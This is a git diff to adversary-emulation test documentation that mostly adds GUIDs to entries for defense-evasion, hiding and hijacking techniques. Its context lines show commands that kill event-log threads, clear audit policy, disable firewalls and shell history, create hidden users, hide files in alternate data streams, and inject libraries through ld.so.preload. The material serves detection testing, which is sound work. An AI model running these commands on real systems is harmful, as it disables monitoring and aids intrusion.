## Atomic Test #2 - Kill Event Log Service Threads -Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html +auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd + +Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html **Supported Platforms:** Windows @@ -92,9 +96,11 @@ Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
## Atomic Test #3 - Impair Windows Audit Log Policy + +auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 + Disables the windows audit policy to prevent key host based telemetry being written into the event logs. [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/) - **Supported Platforms:** Windows @@ -125,8 +131,10 @@ auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
## Atomic Test #4 - Clear Windows Audit Policy Config -Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log. +auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 + +Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log. **Supported Platforms:** Windows diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md index 5bce4173..6a66d737 100644 --- a/atomics/T1562.003/T1562.003.md +++ b/atomics/T1562.003/T1562.003.md @@ -18,15 +18,17 @@ On Windows systems, the PSReadLine module tracks commands used in a
## Atomic Test #1 - Disable history collection -Disables history collection in shells +auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 + +Disables history collection in shells **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | evil_command | Command to run after shell history collection is disabled | String | whoami| @@ -48,11 +50,13 @@ export HISTCONTROL=ignoreboth
## Atomic Test #2 - Mac HISTCONTROL + +auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d + The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile so that it will apply to all future settings as well. https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol - **Supported Platforms:** macOS, Linux diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index 3c2b9eea..f9e8b9f6 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md @@ -24,15 +24,17 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
## Atomic Test #1 - Disable firewall -Disables the firewall +auto_generated_guid: 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 + +Disables the firewall **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | flavor_command | Command to disable firewall. Default firewalld. ufw (Ubuntu) command = ufw disable | String | systemctl stop firewalld ; systemctl disable firewalld| | cleanup_command | Command to enable firewall. Default firewalld. ufw (Ubuntu) command = ufw enable | String | systemctl enable firewalld ; systemctl start firewalld| @@ -58,9 +60,11 @@ Disables the firewall
## Atomic Test #2 - Disable Microsoft Defender Firewall + +auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f + Disables the Microsoft Defender Firewall for the current profile. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... - **Supported Platforms:** Windows @@ -87,9 +91,11 @@ netsh advfirewall set currentprofile state on >nul 2>&1
## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry + +auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 + Disables the Microsoft Defender Firewall for the public profile via registry Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... - **Supported Platforms:** Windows @@ -116,9 +122,11 @@ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Param
## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall + +auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 + Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services... - **Supported Platforms:** Windows @@ -146,10 +154,12 @@ netsh advfirewall reset >nul 2>&1
## Atomic Test #5 - Opening ports for proxy - HARDRAIN + +auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 + This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf - **Supported Platforms:** Windows @@ -176,15 +186,17 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp
## Atomic Test #6 - Open a local port through Windows Firewall to any profile -This test will attempt to open a local port defined by input arguments to any profile +auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed + +This test will attempt to open a local port defined by input arguments to any profile **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | local_port | This is the local port you wish to test opening | integer | 3389| @@ -209,15 +221,17 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null
## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location -This test will attempt to allow an executable through the system firewall located in the Users directory +auto_generated_guid: 6f5822d2-d38d-4f48-9bfc-916607ff6b8c + +This test will attempt to allow an executable through the system firewall located in the Users directory **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_file_path | path to exe file | path | PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe| diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md index 0671e974..c4da8863 100644 --- a/atomics/T1562.006/T1562.006.md +++ b/atomics/T1562.006/T1562.006.md @@ -16,15 +16,17 @@ In the case of network-based reporting of indicators, an adversary may block tra
## Atomic Test #1 - Auditing Configuration Changes on Linux Host -Emulates modification of auditd configuration files +auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 + +Emulates modification of auditd configuration files **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf| | auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf| @@ -61,15 +63,17 @@ sed -i '$ d' /etc/#{libaudit_config_file_name}
## Atomic Test #2 - Logging Configuration Changes on Linux Host -Emulates modification of syslog configuration. +auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c + +Emulates modification of syslog configuration. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf| | rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf| diff --git a/atomics/T1563.002/T1563.002.md b/atomics/T1563.002/T1563.002.md index 7db2e09b..766f1007 100644 --- a/atomics/T1563.002/T1563.002.md +++ b/atomics/T1563.002/T1563.002.md @@ -12,15 +12,17 @@ Adversaries may perform RDP session hijacking which involves stealing a legitima
## Atomic Test #1 - RDP hijacking -[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization +auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46 + +[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | Session_ID | The ID of the session to which you want to connect | String | 1337| | Destination_ID | Connect the session of another user to a different session | String | rdp-tcp#55| diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md index 34beb7d0..33358e45 100644 --- a/atomics/T1564.001/T1564.001.md +++ b/atomics/T1564.001/T1564.001.md @@ -28,8 +28,10 @@ Adversaries can use this to their advantage to hide files and folders anywhere o
## Atomic Test #1 - Create a hidden file in a hidden directory -Creates a hidden file inside a hidden directory +auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be + +Creates a hidden file inside a hidden directory **Supported Platforms:** Linux, macOS @@ -57,8 +59,10 @@ rm -rf /var/tmp/.hidden-directory/
## Atomic Test #2 - Mac Hidden file -Hide a file on MacOS +auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 + +Hide a file on MacOS **Supported Platforms:** macOS @@ -81,16 +85,18 @@ xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF
## Atomic Test #3 - Create Windows System File with Attrib + +auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 + Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details and observe that the Attributes are "SA" for System and Archive. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_modify | File to modify using Attrib command | string | %temp%\T1564.001.txt| @@ -113,7 +119,7 @@ del /A:S #{file_to_modify} >nul 2>&1 ##### Description: The file must exist on disk at specified location (#{file_to_modify}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -127,16 +133,18 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #4 - Create Windows Hidden File with Attrib + +auto_generated_guid: dadb792e-4358-4d8d-9207-b771faa0daa5 + Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file and observe that the Attributes are "SH" for System and Hidden. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_modify | File to modify using Attrib command | string | %temp%\T1564.001.txt| @@ -159,7 +167,7 @@ del /A:H #{file_to_modify} >nul 2>&1 ##### Description: The file must exist on disk at specified location (#{file_to_modify}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -173,15 +181,17 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #5 - Hidden files -Requires Apple Dev Tools +auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 + +Requires Apple Dev Tools **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | filename | path of file to hide | path | /tmp/evil| @@ -202,8 +212,10 @@ setfile -a V #{filename}
## Atomic Test #6 - Hide a Directory -Hide a directory on MacOS +auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 + +Hide a directory on MacOS **Supported Platforms:** macOS @@ -231,8 +243,10 @@ rm /var/tmp/T1564.001_mac.txt
## Atomic Test #7 - Show all hidden files -Show all hidden files on MacOS +auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c + +Show all hidden files on MacOS **Supported Platforms:** macOS diff --git a/atomics/T1564.002/T1564.002.md b/atomics/T1564.002/T1564.002.md index f5066ac0..eb504c9a 100644 --- a/atomics/T1564.002/T1564.002.md +++ b/atomics/T1564.002/T1564.002.md @@ -14,15 +14,17 @@ There is a property value in /Library/Preferences/com.apple.loginwindow ## Atomic Test #1 - Create Hidden User using UniqueID < 500 -Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) +auto_generated_guid: 4238a7f0-a980-4fff-98a2-dfc0a363d507 + +Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username to add | string | APT| @@ -47,15 +49,17 @@ sudo dscl . -delete /Users/#{user_name}
## Atomic Test #2 - Create Hidden User using IsHidden option -Add a hidden user on macOS using IsHidden optoin +auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 + +Add a hidden user on macOS using IsHidden optoin **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username to add | string | APT| diff --git a/atomics/T1564.003/T1564.003.md b/atomics/T1564.003/T1564.003.md index 90ebee33..a554980d 100644 --- a/atomics/T1564.003/T1564.003.md +++ b/atomics/T1564.003/T1564.003.md @@ -16,16 +16,18 @@ Adversaries may abuse these functionalities to hide otherwise visible windows fr
## Atomic Test #1 - Hidden Window + +auto_generated_guid: f151ee37-9e2b-47e6-80e4-550b9f999b7a + Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden. Upon execution a hidden PowerShell window will launch calc.exe - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe| diff --git a/atomics/T1564.004/T1564.004.md b/atomics/T1564.004/T1564.004.md index 1ae1c4e7..1a314f8c 100644 --- a/atomics/T1564.004/T1564.004.md +++ b/atomics/T1564.004/T1564.004.md @@ -18,19 +18,21 @@ Adversaries may store malicious data or binaries in file attribute metadata inst
## Atomic Test #1 - Alternate Data Streams (ADS) + +auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f4602364f4 + Execute from Alternate Streams [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f) [Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path | Path of ADS file | path | c:\ADS\| @@ -60,16 +62,18 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
## Atomic Test #2 - Store file in Alternate Data Stream (ADS) + +auto_generated_guid: 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 + Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | payload_path | Path of file to hide in ADS | path | c:\windows\system32\cmd.exe| | ads_file_path | Path of file to create an ADS under | path | C:\Users\Public\Libraries\yanki\desktop.ini| @@ -99,16 +103,18 @@ Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
## Atomic Test #3 - Create ADS command prompt + +auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb + Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp% folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | File name of file to create ADS on. | string | %temp%\T1564.004_has_ads_cmd.txt| | ads_filename | Name of ADS. | string | adstest.txt| @@ -135,16 +141,18 @@ del #{file_name} >nul 2>&1
## Atomic Test #4 - Create ADS PowerShell + +auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 + Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname" in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | File name of file to create ADS on. | string | $env:TEMP\T1564.004_has_ads_powershell.txt| | ads_filename | Name of ADS file. | string | adstest.txt| @@ -170,7 +178,7 @@ Remove-Item -Path #{file_name} -ErrorAction Ignore ##### Description: The file must exist on disk at specified location (#{file_name}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_name}) { exit 0 } else { exit 1 } +if (Test-Path #{file_name}) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index 333370c2..4bdd4e75 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -16,6 +16,9 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio
## Atomic Test #1 - Extract binary files via VBA + +auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a + This module extracts a binary (calc.exe) from inside of another binary. In the wild maldoc authors will use this technique to hide binaries inside of files stored @@ -27,7 +30,6 @@ This sample contains a document inside of itself. Document 1 is the actual maldo is the same document without all the malicious code. Document 1 will copy Document 2 to the file system and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this oleObject.bin file is a payload that is parsed out and executed on the file system. - **Supported Platforms:** Windows @@ -60,7 +62,7 @@ try { New-Object -COMObject "Word.Application" | Out-Null Stop-Process -Name "winword" exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -74,8 +76,10 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Create a Hidden User Called "$" -Creating a user with a username containing "$" +auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 + +Creating a user with a username containing "$" **Supported Platforms:** Windows @@ -102,8 +106,10 @@ net user $ /DELETE 2>&1
## Atomic Test #3 - Create an "Administrator " user (with a space on the end) -Creating a user with a username containing with a space on the end +auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c + +Creating a user with a username containing with a space on the end **Supported Platforms:** Windows diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index 08745edd..7a3de378 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -14,10 +14,12 @@ There are many options for the attachment such as Microsoft Office documents, ex
## Atomic Test #1 - Download Phishing Attachment - VBScript + +auto_generated_guid: 114ccff9-ae6d-4547-9ead-4cd69f687306 + The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. File is downloaded to the %temp% folder. - **Supported Platforms:** Windows @@ -51,16 +53,18 @@ else{
## Atomic Test #2 - Word spawned a command shell and used an IP address in the command line + +auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f + Word spawning a command prompt then running a command with an IP address in the command line is an indiciator of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8 - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse| | ms_product | Maldoc application Word or Excel | String | Word| @@ -92,7 +96,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1569.001/T1569.001.md b/atomics/T1569.001/T1569.001.md index 62e0d648..1c14ffe9 100644 --- a/atomics/T1569.001/T1569.001.md +++ b/atomics/T1569.001/T1569.001.md @@ -14,15 +14,17 @@ Running a command from launchctl is as simple as launchctl submit -l ## Atomic Test #1 - Launchctl -Utilize launchctl +auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 + +Utilize launchctl **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_path | Path of the executable to run. | path | /System/Applications/Calculator.app/Contents/MacOS/Calculator| | label_name | Path of the executable to run. | string | evil| diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md index be720344..6015e492 100644 --- a/atomics/T1569.002/T1569.002.md +++ b/atomics/T1569.002/T1569.002.md @@ -16,17 +16,19 @@ Adversaries may leverage these mechanisms to execute malicious content. This can
## Atomic Test #1 - Execute a Command as a Service + +auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1 + Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a new file `art-marker.txt` - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | Name of service to create | string | ARTService| | executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt| @@ -54,18 +56,20 @@ del C:\art-marker.txt >nul 2>&1
## Atomic Test #2 - Use PsExec to execute a command on a remote host + +auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c + Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments Will start a process on a remote host. Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_host | Remote hostname or IP address | string | localhost| | user_name | Username | String | DOMAIN\Administrator| @@ -87,7 +91,7 @@ Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a re ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} +if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1571/T1571.md b/atomics/T1571/T1571.md index 2cb01cc2..a9aae7f5 100644 --- a/atomics/T1571/T1571.md +++ b/atomics/T1571/T1571.md @@ -12,16 +12,18 @@
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell + +auto_generated_guid: 21fe622f-8e53-4b31-ba83-6d333c2583f4 + Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful port check will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com| @@ -43,15 +45,17 @@ Test-NetConnection -ComputerName #{domain} -port #{port}
## Atomic Test #2 - Testing usage of uncommonly used port -Testing uncommonly used port utilizing telnet. +auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 + +Testing uncommonly used port utilizing telnet. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com| diff --git a/atomics/T1573/T1573.md b/atomics/T1573/T1573.md index ae595366..ef035415 100644 --- a/atomics/T1573/T1573.md +++ b/atomics/T1573/T1573.md @@ -10,20 +10,22 @@
## Atomic Test #1 - OpenSSL C2 + +auto_generated_guid: 21caf58e-87ad-440c-a6b8-3ac259964003 + Thanks to @OrOneEqualsOne for this quick C2 method. This is to test to see if a C2 session can be established using an SSL socket. More information about this technique, including how to set up the listener, can be found here: https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | IP of the external server | String | 127.0.0.1| | server_port | The port to connect to on the external server | String | 443| diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md index beaef109..dcc50b0e 100644 --- a/atomics/T1574.001/T1574.001.md +++ b/atomics/T1574.001/T1574.001.md @@ -16,11 +16,13 @@ If a search order-vulnerable program is configured to run at a higher privilege
## Atomic Test #1 - DLL Search Order Hijacking - amsi.dll + +auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 + Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. - **Supported Platforms:** Windows diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index a5c25e44..10229d09 100644 --- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -12,16 +12,18 @@ Side-loading takes advantage of the DLL search order used by the loader by posit
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary + +auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 + GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. Upon execution, calc.exe will be opened. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_name | Name of the created process | string | calculator.exe| | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder\T1574.002\bin\GUP.exe| @@ -45,7 +47,7 @@ taskkill /F /IM #{process_name} >nul 2>&1 ##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{gup_executable}) {exit 0} else {exit 1} +if (Test-Path #{gup_executable}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md index 8d8a9ab8..ec61d98f 100644 --- a/atomics/T1574.006/T1574.006.md +++ b/atomics/T1574.006/T1574.006.md @@ -18,17 +18,19 @@ On macOS this behavior is conceptually the same as on Linux, differing only in h
## Atomic Test #1 - Shared Library Injection via /etc/ld.so.preload + +auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_shared_library_source | Path to a shared library source code | Path | PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c| | path_to_shared_library | Path to a shared library object | Path | /tmp/T1574006.so| @@ -52,7 +54,7 @@ sudo sed -i '\~#{path_to_shared_library}~d' /etc/ld.so.preload ##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library}) ##### Check Prereq Commands: ```bash -if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; +if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -66,17 +68,19 @@ gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
## Atomic Test #2 - Shared Library Injection via LD_PRELOAD + +auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae + This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_shared_library_source | Path to a shared library source code | Path | PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c| | path_to_shared_library | Path to a shared library object | Path | /tmp/T1574006.so| @@ -96,7 +100,7 @@ LD_PRELOAD=#{path_to_shared_library} ls ##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library}) ##### Check Prereq Commands: ```bash -if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; +if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1574.009/T1574.009.md b/atomics/T1574.009/T1574.009.md index 88973d56..ffc87c80 100644 --- a/atomics/T1574.009/T1574.009.md +++ b/atomics/T1574.009/T1574.009.md @@ -14,17 +14,19 @@ This technique can be used for persistence if executables are called on a regula
